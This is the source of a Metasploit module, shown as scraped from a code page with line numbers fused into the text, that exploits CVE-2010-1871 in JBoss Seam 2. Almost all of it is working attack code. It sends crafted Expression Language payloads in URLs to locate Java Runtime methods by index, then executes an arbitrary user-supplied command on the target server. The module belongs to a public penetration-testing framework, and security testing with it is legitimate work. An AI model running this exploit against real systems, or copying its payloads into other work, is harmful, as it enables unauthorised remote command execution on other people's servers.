Path: blob/master/modules/auxiliary/admin/http/jboss_seam_exec.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient78def initialize(info = {})9super(10update_info(11info,12'Name' => 'JBoss Seam 2 Remote Command Execution',13'Description' => %q{14JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform154.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression16Language (EL) expressions, which allows remote attackers to execute arbitrary code17via a crafted URL. This modules also has been tested successfully against IBM18WebSphere 6.1 running on iSeries.1920NOTE: this is only a vulnerability when the Java Security Manager is not properly21configured.22},23'Author' => [24'guerrino di massa', # Metasploit module25'Cristiano Maruti <cmaruti[at]gmail.com>' # Support for IBM Websphere 6.126],27'License' => MSF_LICENSE,28'References' => [29['CVE', '2010-1871'],30['OSVDB', '66881']31],32'DisclosureDate' => '2010-07-19',33'Notes' => {34'Stability' => [CRASH_SAFE],35'SideEffects' => [IOC_IN_LOGS],36'Reliability' => []37}38)39)4041register_options(42[43Opt::RPORT(8080),44OptString.new('TARGETURI', [ true, 'Target URI', '/seam-booking/home.seam']),45OptString.new('CMD', [ true, 'The command to execute.'])46]47)48end4950def run51uri = normalize_uri(target_uri.to_s)52cmd_enc = ''53cmd_enc << Rex::Text.uri_encode(datastore['CMD'])5455flag_found_one = 25556flag_found_two = 2555758uri_part_1 = "?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["59uri_part_2 = "].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["60uri_part_3 = "].invoke(null),'"616225.times do |index|63req = uri + uri_part_1 + index.to_s + ']}'6465res = send_request_cgi(66{67'uri' => req,68'method' => 'GET'69}, 2070)7172if res && res.headers['Location'] =~ /java.lang.Runtime.exec%28java.lang.String%29/73flag_found_one = index74print_status('Found right index at [' + index.to_s + '] - exec')75elsif res && res.headers['Location'] =~ /java.lang.Runtime\+java.lang.Runtime.getRuntime/76print_status('Found right index at [' + index.to_s + '] - getRuntime')77flag_found_two = index78else79print_status("Index [#{index}]")80end81end8283if flag_found_one != 255 && flag_found_two != 25584print_status('Target appears VULNERABLE!')85print_status('Sending remote command:' + datastore['CMD'])8687req = uri + uri_part_1 + flag_found_one.to_s + uri_part_2 + flag_found_two.to_s + uri_part_3 + cmd_enc + "')}"8889res = send_request_cgi(90{91'uri' => req,92'method' => 'GET'93}, 2094)9596if res && res.headers['Location'] =~ /pwned=java.lang.UNIXProcess/97print_good('Exploited successfully')98else99print_error('Exploit failed')100end101else102print_error('Target appears not vulnerable!')103end104end105end106107108